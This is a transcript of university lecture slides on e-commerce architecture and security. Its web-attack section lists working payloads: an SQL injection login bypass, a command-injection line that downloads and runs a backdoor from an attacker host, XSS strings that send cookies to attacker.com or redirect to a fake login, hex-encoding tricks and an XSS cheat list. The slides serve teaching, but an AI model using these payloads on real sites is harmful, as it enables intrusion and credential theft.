NETE46301 Transport Layer Security Lecture 5 Supakorn Kungpisdan [email protected].
EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.
-
Upload
adam-craig -
Category
Documents
-
view
224 -
download
0
Transcript of EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.
![Page 1: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/1.jpg)
EC Architectural Framework and EC Security
Lecture 7
Supakorn Kungpisdan
![Page 2: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/2.jpg)
ITEC5611
S. Kungpisdan2
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
![Page 3: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/3.jpg)
ITEC5611
S. Kungpisdan3
Secure Payment ProtocolsOnline Payment Infrastructure
Security and Encryption Technology
Network Protocol StandardsNetwork Infrastructure (Internet)
Business Service InfrastructureDirectories, Search Engines etc
Netw
orked
Mu
ltimed
ia conten
t p
ub
lishin
g techn
ologies( HT
ML
,XM
L,
JAV
A,G
raph
ics, Vid
eo tools etc.)Info
rmat
ion
Dis
trib
uti
on &
Mes
sagi
ng
Tec
hn
olog
ies
( H
TT
P,S
MT
P, e
tc.)
Legal and Public Policy FrameworkPublic key, Identification and Authentication Infrastructure
E-commerce ApplicationsCatalog based retail, Marketing & Advert.,
Banking& Investments, Supply Chain Management, Auctions, Home shopping,
procurements
E-commerce ApplicationsCatalog based retail, Marketing & Advert.,
Banking& Investments, Supply Chain Management, Auctions, Home shopping,
procurements
EC Framework
![Page 4: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/4.jpg)
ITEC5611
S. Kungpisdan4
Network Infrastructure
• The Internet Superhighway is responsible for seamless, reliable transportation on Information among host devices.
• Local Area Networks, IEEE 802.3 Standards and Ethernet
• Wide Area Networks• The Seamless Interface is offered through
– Internet and TCP/IP Model– IP Addressing and Domain Naming System– Internet Industry Structure
![Page 5: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/5.jpg)
ITEC5611
S. Kungpisdan5
Information Distribution Technologies
• Standard Protocols for Information Distribution on Internet– File Transfer Protocol (FTP)– Simple Mail Transfer Protocol (SMTP) – Hyper Text Transfer Protocol (HTTP)– Web Server Implementations
• Apache Web Server• Microsoft’s IIS
![Page 6: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/6.jpg)
ITEC5611
S. Kungpisdan6
Multimedia Publishing Technologies
• Information Publishing and Web Browsers– Hyper Text Markup Language (HTML)– Forms and Common Gateway Interface – Active Server Pages (ASP) – Dynamic HTML– HTML Editors– XML
• Multimedia Content – Graphics and Image Formats– Web Image Formats– Other Multimedia objects
• VRML (Virtual Reality Markup Language)
![Page 7: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/7.jpg)
ITEC5611
S. Kungpisdan7
Security and Encryption
• Importance of security for Electronic Commerce and Inherent vulnerability of Internet
• Protecting the Web (HTTP) Service• The Issues in Transaction Security
– Cryptography and Cryptanalysis– Symmetric key cryptographic Algorithms– Public-key Algorithms– Authentication protocols– Integrity and Non-repudiation
• Digital Certificates and Signatures• Electronic Mail Security
– PGP, S/MIME• Security protocols for E-commerce
– SSL, TLS
![Page 8: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/8.jpg)
ITEC5611
S. Kungpisdan8
Payment Services
• Payment Systems• Characteristics of Online Payment Systems
– Pre-Paid Electronic Payment Systems– Instant-paid Electronic Payment Systems– Post-Paid Electronic Payment Systems
• Some Electronic Payment Systems – Secure Electronic Transaction (SET) for Credit Cards– E-cash– NetCheque
![Page 9: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/9.jpg)
ITEC5611
S. Kungpisdan9
Business Service Infrastructure
• Searching and Locating Information on Web Space• Information Directories• Search Engines• Improving the search results • Internet Advertising
![Page 10: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/10.jpg)
ITEC5611
S. Kungpisdan10
Public Policy and Legal Infrastructure
• Universal Access to Network Infrastructure• Model Law for Electronic Commerce• Taxation Issues in Electronic Commerce• Need for Public Key Infrastructure (PKI)• Digital Certificates and Digital Signatures
![Page 11: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/11.jpg)
ITEC5611
S. Kungpisdan11
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
![Page 12: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/12.jpg)
ITEC5611
S. Kungpisdan12
Basic Security Issues
• From the user’s perspective:– Is Web server owned and operated by a legitimate
company?– Does Web page and form contain any malicious or
dangerous code or content?– Will the owner of the Web site will not distribute the
information the user provides to some other party?
![Page 13: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/13.jpg)
ITEC5611
S. Kungpisdan13
Basic Security Issues (cont.)
• From the company’s perspective:– How does the company know the user will not
attempt to break into the Web server or alter the pages and content at the site?
– How does the company know that the user will not try to disrupt the server so that it is not available to others?
![Page 14: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/14.jpg)
ITEC5611
S. Kungpisdan14
Basic Security Issues (cont.)
• From both parties’ perspectives:– How do both parties know that the network
connection is free from eavesdropping by a third party “listening” on the line?
– How do they know that the information sent back-and-forth between the server and the user’s browser has not been altered?
![Page 15: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/15.jpg)
S. Kungpisdan15
Goals of Computer Security (CIA)
• Confidentiality– Ensure that the message is accessible only by authorized
parties
• Integrity– Ensure that the message is not altered during the
transmission
• Availability– Ensure that the information on the system is available for
authorized parties at appropriate times
ITEC5611
![Page 16: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/16.jpg)
ITEC5611
S. Kungpisdan16
Basic Security Issues
• Authentication• Authorization• Auditing• Confidentiality (Privacy)• Integrity• Availability• Non-repudiation
![Page 17: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/17.jpg)
S. Kungpisdan17
Security Trends
ITEC5611
![Page 18: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/18.jpg)
S. Kungpisdan18
Vulnerabilities, Threats, and Attacks
• Vulnerability– A weakness in the security system
– E.g. a program flaw, poor security configuration, bad password policy
• Threat– A set of circumstances or people that potentially causes
loss or harm to a system
• Attack– An action or series of actions to harm a system
ITEC5611
![Page 19: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/19.jpg)
S. Kungpisdan19
Relationships among different Security Components
ITEC5611
![Page 20: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/20.jpg)
S. Kungpisdan20
Relationship of Threats and Vulnerabilities
ITEC5611
![Page 21: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/21.jpg)
S. Kungpisdan21
How Hackers Exploit Weaknesses
ITEC5611
![Page 22: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/22.jpg)
ITEC5611
S. Kungpisdan22
General Security Issues at EC Sites
![Page 23: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/23.jpg)
ITEC5611
S. Kungpisdan23
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
![Page 24: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/24.jpg)
S. Kungpisdan24
Types of Security Incidences
ITEC5611
![Page 25: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/25.jpg)
S. Kungpisdan25
Hackers
• White Hat Hackers
• Grey Hat Hackers
• Script Kiddies
• Hacktivists
• Crackers or Black Hat Hackers
ITEC5611
![Page 26: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/26.jpg)
S. Kungpisdan26
Hackers’ Steps
1. Gather information Telephone conversation, password crackers
2. Gain initial system access Often limited access and rights
3. Increase privileges and expand access Try to get root privilege
4. Carry out purpose of the attack Steal or destroy information
5. Install backdoors Build entrance for the next visit
6. Cover tracks and exit Remove all traces. Usually modifying log files
ITEC5611
![Page 27: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/27.jpg)
S. Kungpisdan27
Malicious Codes
• Viruses– A destructive program code that attaches itself to a host
and copies itself and spreads to other hosts– Viruses replicates and remains undetected until being
activated.
• Worms– Unlike viruses, worms is independent of other programs or
files. No trigger is needed.
• Trojans– Externally harmless program but contains malicious code
• Spyware– Software installed on a target machine sending information
back to an owning server
ITEC5611
![Page 28: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/28.jpg)
ITEC5611
S. Kungpisdan28
Security Incidences• Probe
– A probe is characterized by unusual attempts to gain access to a system or to discover information about the system.
– Sometimes followed by a more serious security event, but they are often the result of curiosity or confusion.
• Scan – A large number of probes done using an automated tool. – Often a prelude to a more directed attack on systems whose security
can be breached.• Account Compromise
– Unauthorized use of a computer account by someone other than the account owner, without involving system-level or root-level privileges. It might expose the victim to serious data loss, data theft, or theft of services.
– The lack of root-level access means that the damage can usually be contained, but a user-level account opens up avenues for greater access to the system.
![Page 29: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/29.jpg)
ITEC5611
S. Kungpisdan29
Security Incidences (cont’d)
• Root Compromise – Similar to an account compromise, except that the
account that has been compromised has special privileges on the system.
• Packet Sniffer – A program that captures data from information packets
as they travel over the network.
![Page 30: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/30.jpg)
ITEC5611
S. Kungpisdan30
Security Incidences (cont’d)
denial-of-service (DoS) attackAn attack on a Web site in which an attacker uses specialized software to send a flood of data packets to the target computer with the aim of overloading its resources
distributed denial-of-service (DDoS) attackA denial-of-service attack in which the attacker gains illegal administrative access to as many computers on the Internet as possible and uses the multiple computers to send a flood of data packets to the target computer
![Page 31: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/31.jpg)
ITEC5611
S. Kungpisdan31
Using Zombies in a Distributed DoS Attack
![Page 32: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/32.jpg)
ITEC5611
S. Kungpisdan32
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
![Page 33: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/33.jpg)
Attacking Web Applications
• The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data
• This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server
S. Kungpisdan33ITEC5611
![Page 34: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/34.jpg)
SQL Injection
• Many web applications rely on backend DBs for information storage and retrieval.
• Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters
• Consider the following:• Query = “SELECT * FROM users WHERE username =
‘{$_POST[‘user’]}’ AND password = ‘{$_POST[‘pass’]}’ ”;
• “SELECT * FROM users WHERE username = ‘bob’ AND password = ‘ ’ OR 1=1 ”;
S. Kungpisdan34ITEC5611
![Page 35: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/35.jpg)
Code Injection
• Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments
• Consider a PHP script that takes a string supplied from web page form and passes it to the nslookup utility
S. Kungpisdan35ITEC5611
![Page 36: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/36.jpg)
Code Injection (cont.)
• If supply ;ls –la/, the script will execute the command nslookup;ls –la/, resulting in a listing of the root directory being printed out
S. Kungpisdan36ITEC5611
![Page 37: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/37.jpg)
Code Injection (cont.)
• wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script
• ;wget http://attackersite/backdoor.pl;perl backdoor.pl
S. Kungpisdan37ITEC5611
![Page 38: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/38.jpg)
Cross-Site Scripting (XSS)
• XSS vulnerabilities allow attackers to inject code or HTML into a web page that will be executed when a different user visits that page
• These attacks target visitors to a web site, not the site itself, and occur when a web page does not properly sanitize user input before using it in output
• As a matter of fact in vulnerable websites is possible to execute HTML and JavaScript codes from a not sanitized form, which combined can be really dangerous: it's possible to steal cookies or to redirect web pages to build fake login in order to steal login usernames and passwords.
S. Kungpisdan38ITEC5611
![Page 39: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/39.jpg)
Types of XSS
• The term XSS is actually a bit elusive because it includes different kinds of attacks that stands each other on different attacking mechanisms.
• There are actually three types of Cross-Site Scripting, commonly named as: – DOM-Based XSS – Non-persistent XSS – Persistent XSS
S. Kungpisdan39
Ref: http://www.milw0rm.com/papers/146http://en.wikipedia.org/wiki/Cross_Site_Scripting
ITEC5611
![Page 40: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/40.jpg)
DOM-based XSS
• DOM-based or Type 0 XSS vulnerability, also referred to as local XSS, is based on the standard object model for representing HTML or XML called the Document Object Model or DOM for short.
• The DOM-Based XSS allows to an attacker to work not on a victim website but on a victim local machine
S. Kungpisdan40ITEC5611
![Page 41: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/41.jpg)
DOM-based XSS (cont.)
1. The attacker creates a well-built malicious website
2. The ingenuous user opens that site
3. The user has a vulnerable page on his machine
4. The attacker's website sends commands to the vulnerable HTML page
5. The vulnerable local page execute that commands with the user's privileges on that machine
6. The attacker easily gain control on the victim computer.
S. Kungpisdan41ITEC5611
![Page 42: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/42.jpg)
Exploit Scenario
1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
2. Alice clicks on the link.
3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.
4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.
5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.
S. Kungpisdan42ITEC5611
![Page 43: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/43.jpg)
DOM-based XSS (cont.)
• DOM-based XSS is really dangerous because it operates on the victim system strictly and as long as the user doesn't look after his/her security issues and doesn't apply updates, the DOM-Based XSS will work fine.
• Solution: To prevent this kind of attacks there are only two things to take care of:– Do not visit untrusted website – Keep your system up to date
S. Kungpisdan43ITEC5611
![Page 44: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/44.jpg)
Non-persistent XSS
• The non-persistent or Type 1 XSS is also referred to as a reflected vulnerability, and is by far the most common type.
• It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website
• It shows up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user.
• If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page
S. Kungpisdan44ITEC5611
![Page 45: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/45.jpg)
Non-persistent XSS: Search Engine
• Attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.
• If this happens at 99% the Search engine will execute also JavaScript arbitrary code.
S. Kungpisdan45ITEC5611
![Page 46: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/46.jpg)
Example
1. Assure that a website works like this: http://www.example.com/search.php?text=TEXTTOSEARCH
2. Try to include some HTML tags in the "text" variable: http://www.example.com/search.php?text=<img src="http://attacker.com/image.jpg">
If the website is vulnerable it will display the attacker's image into the result webpage.
S. Kungpisdan46ITEC5611
![Page 47: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/47.jpg)
Example (cont.)
3. Try then to write some JavaScript code: http:///www.example.com/search.php?text=<script>alert(document.cookie)</script>
Probably the website will return an alert popup with the current Cookie for the site itself.
S. Kungpisdan47ITEC5611
![Page 48: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/48.jpg)
Example (cont.)
• This vulnerability can be used by the attacker to steal information to users of the victim website providing them for example an email with an URL like: http://www.victim.com/search.php?text=MALICIOUSCODE
• To make that URL less suspicious it will be useful to encode the code in URL Hex valueFor example the code: <script>alert("XSS")</script> Encoded will look like: %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C %2F%73%63%72%69%70%74%3E
S. Kungpisdan48ITEC5611
![Page 49: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/49.jpg)
Example (cont.)
• And as comes the malicious url will turn from:
http://www.victim.com/search.php?text=<script>alert("XSS")</script>
Into: http://www.victim.com/search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22 %58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Which, for a clueless user, it's lot less suspicious than the first one.
S. Kungpisdan49ITEC5611
![Page 50: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/50.jpg)
Example (cont.)
1. The attacker realizes that the victim website is vulnerable to XSS
2. The attacker creates on his website an ad-hoc page which is used to steal sensible information, e.g. Cookies, or to make a fake login of the victim website.
3. The attacker provides to a user a crafted URL containing a malicious code like:
http://www.victim.com/search.php?text= <script>document.location("http://attackersite.com/fakelogin.php")</script>
Encoded in Hex.
4. The user visits the web page and is obscurely redirect the attacker's fakelogin
5. The user is invited to log into the system and he does.
6. The fake login steals the username and password of the victim.
S. Kungpisdan50ITEC5611
![Page 51: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/51.jpg)
Exploit Scenario
1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information.
2. Mallory observes that Bob's website contains a reflected XSS vulnerability.
3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, making it look as if it came from Bob (i.e., the email is spoofed).
4. Alice visits the URL provided by Mallory while logged into Bob's website.
S. Kungpisdan51ITEC5611
![Page 52: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/52.jpg)
Exploit Scenario (cont.)
5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server. The script can be used to email Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc) without Alice's knowledge.
S. Kungpisdan52ITEC5611
![Page 53: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/53.jpg)
Interesting Example
• http://www.yannarak.net/node/2
S. Kungpisdan53ITEC5611
![Page 54: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/54.jpg)
Persistent XSS
• The persistent XSS is similar to non-persistent XSS – Both works on a victim site and tries to hack user information
• However, attacker doesn't need to provide the crafted URL to the users
• Because the website itself permits to users to insert fixed data into the system– This is the case for example of "guestbooks"
• Usually the users use that kind of tool to leave messages to the owner of the website
• An attacker can insert some malicious code in his message and let ALL visitors to be victim of that.
S. Kungpisdan54ITEC5611
![Page 55: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/55.jpg)
Exploit Scenario
1. Bob hosts a web site allowing users to post messages and other content to the site for later viewing by other members.
2. Mallory notices that Bob's website is vulnerable to a type 2 XSS attack.
3. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it.
4. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's web server without their knowledge.
5. Later, Mallory logs in as other site users and posts messages on their behalf....
S. Kungpisdan55ITEC5611
![Page 56: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/56.jpg)
Exploit Scenario (cont.)
• This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided from the user into the result page.
• The attacker could easily insert as much code as he wants into the tool, for example:
<img src="javascript:document.location ('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));">
This allows the attacker to steal the cookie of the victim user.
S. Kungpisdan56ITEC5611
![Page 57: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/57.jpg)
More about XSS
• In order to make the attack less suspicious it's possible to "obfuscate" the IP address of the attacker's website, encoding the IP address with three formats: – Dword Address
– Hex Address
– Octal Address
• For example the IP address 127.0.0.1 will look like: – Dword: 2130706433 – Hex: 0x7f.0x00.0x00.0x01 – Octal: 0177.0000.0000.0001
• Try for example: http://0x7f.0x00.0x00.0x01/ and it will open your localhost web server.
S. Kungpisdan57ITEC5611
![Page 58: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/58.jpg)
Possible XSS Cheats
• <IMG SRC="javascript:alert('XSS');"> • <IMG SRC=javascript:alert('XSS')> • <IMG
SRC="javascript :alert('PLAYH ACK.NET')">
• <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"> • <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT> • <<SCRIPT>alert("XSS");//<</SCRIPT> • <iframe src=http://example.com/scriptlet.html < • <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> • <BODY BACKGROUND="javascript:alert('XSS')"> • <BODY ONLOAD=alert(document.cookie)> • <IMG DYNSRC="javascript:alert('XSS')">
S. Kungpisdan58ITEC5611
![Page 59: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/59.jpg)
Possible XSS Cheats (cont.)
• <IMG DYNSRC="javascript:alert('XSS')"> <BR SIZE="&{alert('XSS')}">
• <IMG SRC='vbscript:msgbox("XSS")'> • <TABLE BACKGROUND="javascript:alert('XSS')"> • <DIV STYLE="width: expression(alert('XSS'));"> • <DIV STYLE="background-image:
url(javascript:alert('XSS'))"> • <STYLE TYPE="text/javascript">alert('XSS');</STYLE> • <STYLE
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
• <?='<SCRIPT>alert("XSS")</SCRIPT>'?> • <A
HREF="javascript:document.location='http://www.example.com/'">XSS</A>
S. Kungpisdan59ITEC5611
![Page 60: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/60.jpg)
Information Disclosure
• An error page can discloses the path of thee web server’s root directory
• The path disclosure can aid attackers performing reconnaissance on the site
• phpinfo.php, part of a default PHP install, is a script providing the OS and software version on the host and other related information
• Google for inurl:phpinfo.php to see exactly how much information is leaked
S. Kungpisdan60ITEC5611
![Page 61: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/61.jpg)
ITEC5611
S. Kungpisdan61
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
![Page 62: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/62.jpg)
ITEC5611
S. Kungpisdan62
CIA for Access Control
• Confidentiality– Not disclosed to unauthorized person
• Integrity– Prevention of modification by unauthorized users– Prevention of unauthorized changes by otherwise authorized
users– Internal and External Consistency– Internal Consistency within the system (i.e. within a database
the sum of subtotals is equal to the sum of all units)– External Consistency – database with the real world (i.e.
database total is equal to the actual inventory in the warehouse)
• Availability– Timely access
![Page 63: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/63.jpg)
ITEC5611
S. Kungpisdan63
Security Controls
Ref: . Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill
![Page 64: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/64.jpg)
ITEC5611
S. Kungpisdan64
